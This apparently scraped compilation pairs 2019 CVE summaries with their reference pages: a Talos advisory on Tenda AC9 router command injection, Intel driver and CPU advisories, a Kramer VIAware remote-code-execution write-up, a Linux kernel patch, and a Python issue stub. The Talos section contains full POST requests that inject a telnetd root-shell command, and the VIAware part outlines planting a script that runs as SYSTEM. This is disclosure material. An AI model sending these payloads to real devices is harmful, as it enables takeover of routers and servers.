Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-13720

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16multiTRU). A specially crafted HTTP POST request can cause a command injection in the DNS1 post parameters, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

**Summary**

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16\_multi\_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

**Tested Versions**

AC9V1.0 Firmware V15.03.05.16\_multi\_TRU AC9V1.0 Firmware V15.03.05.14\_EN

**Product URLs**

AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78: Improper Neutralization of Special Elements usedin an OS Command (‘OS Command Injection’)

**Details**

Tenda AC9 is one of the popular and low cost Smart Dual-Band Gigabit WiFi Router available on many of the online shopping sites like Amazon.

There exists command injection vulnerability in /goform/WanParameterSetting resource. Local authenticated attacker can include arbritary commands to post parameters to execute commands on the Tenda AC9 routerThe attacker can get reverse shell running as root using this commnad injection.

**CVE-2019-5071 - Command injection in the DNS1 post parameters**

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

     POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
     Host: 10.10.10.1
     Content-Length: 193
     Accept: */*
     Origin: http://10.10.10.1
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Referer: http://10.10.10.1/main.html
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
     Connection: close
    
     wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
    

**CVE-2019-5072 - Command injection in the DNS2 post parameters**

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

     POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
     Host: 10.10.10.1
     Content-Length: 193
     Accept: */*
     Origin: http://10.10.10.1
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Referer: http://10.10.10.1/main.html
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
     Connection: close
    
     wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
    

**Timeline**

2019-07-29 - Initial contact  
2019-08-07 - Sent plain text file  
2019-10-02 - 60+ day follow up  
2019-10-21 - 90 day follow up  
2019-11-21 - Public Release

Discovered by Amit N. Raut of Cisco Talos.

CVE-2019-5071: TALOS-2019-0861 || Cisco Talos Intelligence Group

Pointer corruption in the Unified Shader Compiler in Intel(R) Graphics Drivers before 10.18.14.5074 (aka 15.36.x.5074) may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – Intel® Graphics Driver for Windows\* and Linux Advisory**

Intel ID:

INTEL-SA-00242

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

11/12/2019

Last revised:

11/12/2019

**Summary: **

Potential security vulnerabilities in Intel® Graphics Driver for Windows\* and Linux may allow denial of service.  Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-11112

Description: Memory corruption in Kernel Mode Driver in Intel(R) Graphics Driver before 26.20.100.6813 (DCH) or 26.20.100.6812 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0155

Description: Insufficient access control in a subsystem for Intel (R) processor graphics in 6th, 7th, 8th and 9th Generation Intel(R) Core(TM) Processor Families; Intel(R) Pentium(R) Processor J, N, Silver and Gold Series; Intel(R) Celeron(R) Processor J, N, G3900 and G4900 Series; Intel(R) Atom(R) Processor A and E3900 Series; Intel(R) Xeon(R) Processor E3-1500 v5 and v6, E-2100 and E-2200 Processor Families; Intel(R) Graphics Driver for Windows\* before 26.20.100.6813 (DCH) or 26.20.100.6812 and before 21.20.x.5077 (aka15.45.5077), i915 Linux Driver for Intel(R) Processor Graphics before versions 5.4-rc7, 5.3.11, 4.19.84, 4.14.154, 4.9.201, 4.4.201 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-11111

Description: Pointer corruption in the Unified Shader Compiler in Intel(R) Graphics Drivers before 10.18.14.5074 (aka 15.36.x.5074) may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2019-14574

Description: Out of bounds read in a subsystem for Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2019-14590  

Description: Improper access control in the API for the Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2019-14591

Description: Improper input validation in the API for Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2019-11089

Description: Insufficient input validation in Kernel Mode module for Intel(R) Graphics Driver before version 25.20.100.6519 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.9 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

CVEID: CVE-2019-11113  

Description: Buffer overflow in Kernel Mode module for Intel(R) Graphics Driver before version 25.20.100.6618 (DCH) or 21.20.x.5077 (aka15.45.5077) may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.0 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

**Affected Products:**

6th, 7th, 8th, and 9th Gen Intel® Core™ processor family & 6th Gen Intel® Core™ processor family systems running Windows\* 7 or Windows\* 8.1 with Intel® Graphics Driver for Windows\* before 26.20.100.6813 (DCH) or 26.20.100.6812 and before 21.20.x.5077 (aka15.45.5077).

4th Generation Intel® Core™/ Pentium®/ Xeon® (E3 v3 only) Processors systems running Windows\* 7 or Windows\* 8.1 with Intel® Graphics Driver for Windows\* before versions 10.18.14.5074 (aka 15.36.x.5074).

**Recommendations:**

Intel recommends updating the Intel® Graphics Driver for Windows\* and i915 Linux Driver to the latest version.

Windows\* Driver updates are available for download at this location: https://downloadcenter.intel.com/product/80939/Graphics-Drivers  

For i915 Linux Driver updates to mitigate CVE-2019-0155, contact your Linux OS Vendor.

**Acknowledgements:**

Intel would like to thank Piotr Bania of Cisco TALOS (CVE-2019-14574), 

SSD Secure Disclosure / Ori Nimron / @orinimron123 (CVE-2019-11112) and Rancho Han of Tencent Security ZhanluLab (CVE-2019-11111) for reporting these issues and working with us on coordinated disclosure.

The additional issues were found internally by Intel employees.  Intel would like to thank Artem Shishkin, Edgar Barbosa, Gabriel Barbosa, Gustavo Scotti, Kekai Hu, Rodrigo Axel Monroy, and Rodrigo Branco.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/12/2019

Initial Release

1.1

11/12/2019  

Added Linux for CVE-2019-0155  

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11111: INTEL-SA-00242

Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – Intel® Processor Machine Check Error Advisory**

**Summary: **

A potential security vulnerability in some Intel® Processors may allow denial of service. Intel has coordinated with OS and hypervisor vendors to provide updates which will mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2018-12207

Description: Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

A list of impacted products can be found here.

**Recommendations:**

To mitigate this vulnerability, operating system and hypervisor vendors will be providing software updates. Please contact your operating system vendor for additional details.

Additional Advisory Guidance on CVE-2018-12207 available here.

**Acknowledgements:**

The following issue was found internally by Intel. Intel would like to thank Deepak Gupta.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/12/19

Initial Release

1.1

09/29/20

Updated Affected Products

1.2

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2018-12207: INTEL-SA-00210

Improper conditions check in the voltage modulation interface for some Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – Intel® Xeon® Scalable Processors Voltage Setting Modulation Advisory**

**Summary: **

A potential security vulnerability in some Intel® Xeon® Scalable Processors may allow denial of service.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-11139

Description:  Improper conditions check in the voltage modulation interface for some Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score:  5.8 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:H

**Affected Products:**

Intel® Xeon® Scalable Processors:

*   Intel® Xeon® Platinum Processors: 8153, 8156, 8158, 8160, 8160F, 8160M, 8160T, 8164, 8168, 8170, 8170M, 8176, 8176F, 8176M, 8180, 8180M
*   Intel® Xeon® Gold Processors: 5115, 5118, 5119T, 5120, 5120T, 5122, 6126, 6126F, 6126T, 6128, 6130, 6130F, 6130T, 6132, 6134, 6134M, 6136, 6138, 6138F, 6138T, 6140, 6140M, 6142, 6142F, 6142M, 6144, 6146, 6148, 6148F, 6150, 6152, 6154  
    
*   Intel® Xeon® Silver Processors: 4108, 4109T, 4110, 4112, 4114, 4114T, 4116, 4116T  
    
*   Intel® Xeon® Bronze Processors: 3104, 3106  
    

**Recommendations:**

Intel recommends that users of the Intel® Xeon® Scalable Processors listed above update to the latest firmware version provided by the system manufacturer that addresses these issues.

If the system configuration is believed to be untrusted, it is recommended that the firmware update only be applied through the BIOS.

**Acknowledgements:**

This issue was found internally by Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/12/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11139: INTEL-SA-00271

TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – TSX Asynchronous Abort Advisory**

**Summary: **

A potential security vulnerability in TSX Asynchronous Abort (TAA) for some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID:  CVE-2019-11135

Description:  TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products: **

This issue affects all current processors that support Intel© TSX unless IA32\_ARCH\_CAPABILITIES.TAA\_NO (bit 8)=1. On CPUs affected by MDS, where IA32\_ARCH\_CAPABILITIES.MDS\_NO (bit 5)=0, the existing MDS mitigations will also mitigate against TAA. 

A list of impacted products can be found here.

**Recommendations:  
**

Intel recommends that users of the affected Intel® Processors listed above, update to the latest firmware version provided by the system manufacturer that addresses these issues.

For additional microcode information about the affected products, see here for the generic list of latest microcode updates including those for Intel-SA-00270.  

Additional technical details about TAA can be found here.

Additional Advisory Guidance on CVE-2019-11135 available here.

**Acknowledgements:**

Intel would like to thank the following individuals for finding and reporting the vulnerability to us via coordinated disclosure.

Intel thanks VU Amsterdam, CISPA to coordinate disclosure of TAA after the initial publication of their RIDL paper.  

VUSec group at VU Amsterdam: Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida. 

CISPA Helmholtz Center for Information Security: Giorgi Maisuradze.

Intel thanks TU Graz and KU Leuven to coordinate disclosure of TAA after the initial publication of their ZombieLoad paper.  

Graz University of Technology: Moritz Lipp, Michael Schwarz, Daniel Gruss. 

KU Leuven: Jo Van Bulck.

Researchers from VUSec group at VU Amsterdam and CISPA Helmholtz Center provided Intel with a Proof of Concept (POC) in September 2018 and researchers from TU Graz and Ku Leuven provided Proof of Concept (POC) in April 2019. Intel subsequently confirmed each submission demonstrates TAA individually.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available. 

**Revision History**

Revision

Date

Description

1.0

11/12/2019  

Initial Release

1.1

11/12/2019

Updated Affected Products & Microcode References

1.2

12/03/2019

Updated Affected Products

1.3

04/21/2020

Updated Affected Products

1.4

09/29/2020

Updated Affected Products

1.5

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11135: INTEL-SA-00270

Kramer VIAware 2.5.0719.1034 has Incorrect Access Control.

**Exploit Title: KRAMER VIAware 2.5.0719.1034 - Remote Code Execution**

Date: 2019-10-02  
Author: Andrew Hess  
Software Link: https://www.kramerav.com/us/product/viaware  
Version: 2.5.0719.1034  
CVE: CVE-2019-17124  

**History**

2019.10.02 - Vulnerability discovered  
2019.10.02 - Initial contact with the vendor  
2019.10.04 - Second contact with the vendor  
2019.10.08 - No reply from the vendor  
2019.10.09 - Public security advisory released  

**Software description**

All the advanced wireless presentation and collaboration tools offered by VIA Campus can now be used on your own PC to enhance collaborative meetings in Corporate environments and interactive learning in Education and training environments. From any laptop or mobile device, any in-room meeting participant or trainee can view the main display, edit documents together in real time, share any size file, turn the main display into a digital whiteboard, and more. VIAware also lets facilitators use e-polling and e-exams to easily and instantly measure how much students & trainees are actually learning. VIAware can show up to six user screens on one main display or up to 12 screens on two displays (hardware-dependent) and features iOS mirroring for MacBook, iPad, and iPhone as well as native mirroring for Chromebook, Android (Lollipop OS 5.0 or newer), and Windows phone. Remote students can easily join the class and collaborate in real time with embedded 3rd-party video conferencing and office apps. VIAware delivers the same security offered by all VIA devices and can be installed on any computer running Windows 10, providing IT managers the versatility they need. The software works seamlessly with your existing VIA clients and VIA Site Management and offers full support for all VIA Quick Connect features, such as QR Code, NFC Tag and VIA Pad. VIAware is available as a one-time license with optional annual upgrade subscriptions or as a recurring annual subscription.

**Exploit description**

The VIAware software is installed on a gateway computer that can have two network cards.  
One network card for the internal network and one for the external network (access point) to which the guests connect.

This scenario makes it dangerous because unblocked services can be attacked from the external network.

In our scenario, the web service can be attacked from the external network if it is not blocked by a firewall rule.

The web service is used to make the VIAapp software available to guests.

**Design**

**POC****Check for VIAware Webservice**

**Call the vulnerable website (https://viaware/browseSystemFiles.php?path=C:\\Windows&icon=browser). This site is only for admins, but does not check the session correctly and lets anonymous users on the site.**

**Through this site we can already collect information about the server. But there is more.**

**The rev="string" variable can be adjusted arbitrarily on the client side. This is the string that is written to a file.**

**In our test we put a demo string**

**We can also specify any file in which this script will be written. So it is possible to place shellcode (value="string")**

**Now trigger the action with one click e.g. on notepad.exe  
**

**On server side the file was created with content  
**

**If we have put an exploit.cmd script into the apache cgi-bin folder, we can execute the script arbitrarily from a browser call.**

**In the standard installation the Apache service runs in the SYSTEM context and executes the scripts as SYSTEM.**

CVE-2019-17124: GitHub - hessandrew/CVE-2019-17124: KRAMER VIAware 2.5.0719.1034 - Remote Code Execution

Amazon FreeRTOS up to and including v1.4.8 lacks length checking in prvProcessReceivedPublish, resulting in untargetable leakage of arbitrary memory contents on a device to an attacker. If an attacker has the authorization to send a malformed MQTT publish packet to an Amazon IoT Thing, which interacts with an associated vulnerable MQTT message in the application, specific circumstances could trigger this vulnerability.

**Ending Support for Internet Explorer**

Got it

AWS support for Internet Explorer ends on 07/31/2022. Supported browsers are Chrome, Firefox, Edge, and Safari. Learn more »

Got it

CVE-2019-13120: FreeRTOS Security Updates

In the Linux kernel through 5.3.2, cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c does not reject a long SSID IE, leading to a Buffer Overflow.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       linux-wireless
Subject:    \[PATCH 2/2\] cfg80211: wext: Reject malformed SSID elements
From:       Will Deacon <will () kernel ! org>
Date:       2019-10-04 9:51:32
Message-ID: 20191004095132.15777-2-will () kernel ! org
\[Download RAW message or body\]**

Ensure the SSID element is bounds-checked prior to invoking memcpy()
with its length field.

Cc: <stable@vger.kernel.org>
Cc: Johannes Berg <johannes@sipsolutions.net>
Cc: Kees Cook <keescook@chromium.org>
Reported-by: Nicolas Waisman <nico@semmle.com>
Signed-off-by: Will Deacon <will@kernel.org>
---
 net/wireless/wext-sme.c | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/net/wireless/wext-sme.c b/net/wireless/wext-sme.c
index c67d7a82ab13..3fd2cc7fc36a 100644
--- a/net/wireless/wext-sme.c
+++ b/net/wireless/wext-sme.c
@@ -201,6 +201,7 @@ int cfg80211\_mgd\_wext\_giwessid(struct net\_device \*dev,
 			       struct iw\_request\_info \*info,
 			       struct iw\_point \*data, char \*ssid)
 {
+	int ret = 0;
 	struct wireless\_dev \*wdev = dev->ieee80211\_ptr;
 
 	/\* call only for station! \*/
@@ -219,7 +220,10 @@ int cfg80211\_mgd\_wext\_giwessid(struct net\_device \*dev,
 		if (ie) {
 			data->flags = 1;
 			data->length = ie\[1\];
-			memcpy(ssid, ie + 2, data->length);
+			if (data->length > IW\_ESSID\_MAX\_SIZE)
+				ret = -EINVAL;
+			else
+				memcpy(ssid, ie + 2, data->length);
 		}
 		rcu\_read\_unlock();
 	} else if (wdev->wext.connect.ssid && wdev->wext.connect.ssid\_len) {
@@ -229,7 +233,7 @@ int cfg80211\_mgd\_wext\_giwessid(struct net\_device \*dev,
 	}
 	wdev\_unlock(wdev);
 
-	return 0;
+	return ret;
 }
 
 int cfg80211\_mgd\_wext\_siwap(struct net\_device \*dev,
-- 
2.23.0.581.g78d2f28ef7-goog

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-2019-17133: '[PATCH 2/2] cfg80211: wext: Reject malformed SSID elements'

The documentation XML-RPC server in Python through 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has XSS via the server_title field. This occurs in Lib/DocXMLRPCServer.py in Python 2.x, and in Lib/xmlrpc/server.py in Python 3.x. If set_server_title is called with untrusted input, arbitrary JavaScript can be delivered to clients that visit the http URL for this server.

Issue38243

Created on **2019-09-21 02:17** by **longwenzhang**, last changed **2022-04-11 14:59** by **admin**. This issue is now **closed**.

Files

File name

Uploaded

Description

Edit

poc.py

longwenzhang, 2019-09-21 02:17

Pull Requests

URL

Status

Linked

Edit

PR 16373

merged

corona10, 2019-09-25 04:23

PR 16439

merged

miss-islington, 2019-09-27 20:00

PR 16440

merged

miss-islington, 2019-09-27 20:00

PR 16441

merged

vstinner, 2019-09-27 20:03

PR 16447

merged

corona10, 2019-09-28 01:20

PR 16516

merged

vstinner, 2019-10-01 10:59

Messages (19)

msg352921 - (view)

Author: longwenzhang (longwenzhang) \*

Date: 2019-09-21 02:17

It's "Lib/DocXMLRPCServer.py" in python2x or "Lib/xmlrpc/server.py" in python3x.

Steps to reproduce:

